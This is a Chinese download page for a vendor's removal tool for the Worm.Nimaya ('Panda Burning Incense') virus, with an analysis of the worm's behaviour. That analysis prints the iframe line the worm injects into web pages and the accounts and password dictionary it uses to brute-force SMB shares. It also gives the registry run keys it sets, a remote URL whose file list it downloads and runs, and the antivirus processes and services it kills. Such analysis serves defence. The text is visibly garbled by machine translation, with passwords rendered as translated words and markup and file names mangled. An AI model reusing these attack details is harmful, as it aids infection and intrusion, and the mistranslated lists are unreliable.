工具名稱:Worm。Nimaya(熊貓燒香)專用清潔工具。
軟件版本:1.8
軟件大小:332KB
應用平臺:Windows
更新時間:2007-01-24
發布日期:2006-11-14
出版公司:北京瑞星科技有限公司
下載地址:
/zsgj/NimayaKiller.scr
這是壹個用Delphi寫的很有感染力的下載。
該病毒的主要行為:
壹.通信
1.本地磁盤感染
該病毒在系統中除磁盤字母A和b之外的所有具有drive _ remote和drive _ fixed磁盤類型的磁盤上進行。
文件遍歷感染註意:不要感染大小超過1045760字節的文件。
(病毒不會感染以下目錄中的文件):
Microsoft Frontpage
電影制作人
MSN遊戲區
公共文件
windows操作系統
重復利用
系統卷信息
文檔和設置
....
(病毒不會感染具有以下文件名的文件):
setup.exe
NTDETECT.COM
該病毒會使用兩種感染方式感染不同後綴的文件名。
1.二進制可執行文件(後綴:EXE、SCR、PIF、COM)
將被感染的目標文件和病毒溶解成壹個文件(被感染的文件附在病毒文件的尾部)完成感染。
2.腳本類(後綴:htm,html,asp,php,jsp,aspx)
在這些腳本文件的末尾添加以下鏈接(以下頁面有安全漏洞):
& ltiframe src =/worm . htm width = height = 0 & gt;& lt/iframe & gt;
感染時,後綴名為。GHO將從這些磁盤中刪除。
2.生成autorun.inf
該病毒會創建壹個計時器,並在磁盤的根目錄下生成,周期為6秒。
Setup.exe(病毒本身)autorun.inf並使用autorun打開關聯。
這樣當用戶點擊被感染的磁盤時,病毒就會自動運行。
3.局域網通信
病毒是隨機產生的,幾個局域網傳播線程實現了以下幾種傳播方式:
當病毒發現可以成功連接到攻擊目標的139或445端口時,會使用內置的用戶列表和密碼字典。
建立聯系。(猜測被攻擊方的密碼)當連接成功後,復制自己,用它來規劃任務。
激活病毒。
密碼猜測嘗試的賬號為:
管理人員
客人
管理
根
用於密碼嘗試的字典是:
1234
密碼
6969
哈利
123456
高爾夫球
貓咪
野馬
1111
陰影
1313
魚
5150
7777
標準英語打字鍵盤的
棒球
2112
萊特梅因
米恩
12345678
12345
管理
5201314
qq520
1234567
123456789
654321
54321
000000
11111111
88888888
及格
密碼
數據庫
加快收寄投遞系統
abc123
賽貝斯
123qwe
計算機網絡服務器
計算機
極好的
123 a d
伊哈韋諾帕斯
上帝保佑妳
使能夠
2002
2003
2600
希臘字母的第壹個字母
111111
121212
123123
1234qwer
123abc
帕特裏克
管理人員
阿托爾
根
去妳的
他媽的
試驗
測試123
臨時雇員
溫度123
asdf
qwer
yxcv
zxcv
家
物主
登錄
登錄
pw123
愛
mypc
mypc123
admin123
我的通行證
我的通行證123
901100
2.修改操作系統的啟動關聯
病毒會將自己復制到%SYSTEM32%\DRIVERS\目錄,文件名為:spcolsv.exe將使用。
1秒為周期,連續設置以下鍵值:
HKEY _當前用戶\軟件\微軟\ Windows \當前版本\運行
Svcshare=%病毒文件路徑%
HKEY _ LOCAL _ MACHINE \ SOFTWARE \ Microsoft \ Windows
\當前版本\資源管理器\高級\文件夾\隱藏\顯示全部
CheckedValue=0
3.下載文件開始
該病毒將每20分鐘嘗試讀取特定網站上的下載文件列表。
如:http://wangma.9966.org/down.txt
下載文件列表中指定的文件並啟動這些程序。
4.面對殺毒軟件
1.關閉包含以下字符串的窗口:
防火墻
病毒掃描
NOD32
Netdart
消毒
杜巴
瑞星殺毒軟件
超級兔子
最優化碩士
掌握
特洛伊清掃車
特洛伊清掃車
卡巴斯基反病毒軟件
賽門鐵克防病毒軟件
杜巴
尊重過程
綠鷹電腦
密碼防盜
噬菌體
特洛伊輔助取景器
系統安全監視器
包裝禮品黑仔
Winsock專家
特洛伊馬匹檢測大師
反間諜軟件工具包
冰劍
2.結束以下流程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_。可執行程序的擴展名
Logo_1.exe
Rundl132.exe
regedit.exe
msconfig.exe
taskmgr.exe
3.關閉並刪除下列服務:
日程安排
共享訪問
RsCCenter
RsRavMon
RsCCenter
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
麥克希爾
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
賽門鐵克核心LC
NPFMntor
MskService
FireSvc
註意:
因為病毒會感染系統的htm、html、asp、php、jsp、aspx等文件,並給它添加壹些安全漏洞。
病毒傳播的鏈接。如果服務器被感染,會大大增加病毒傳播的範圍。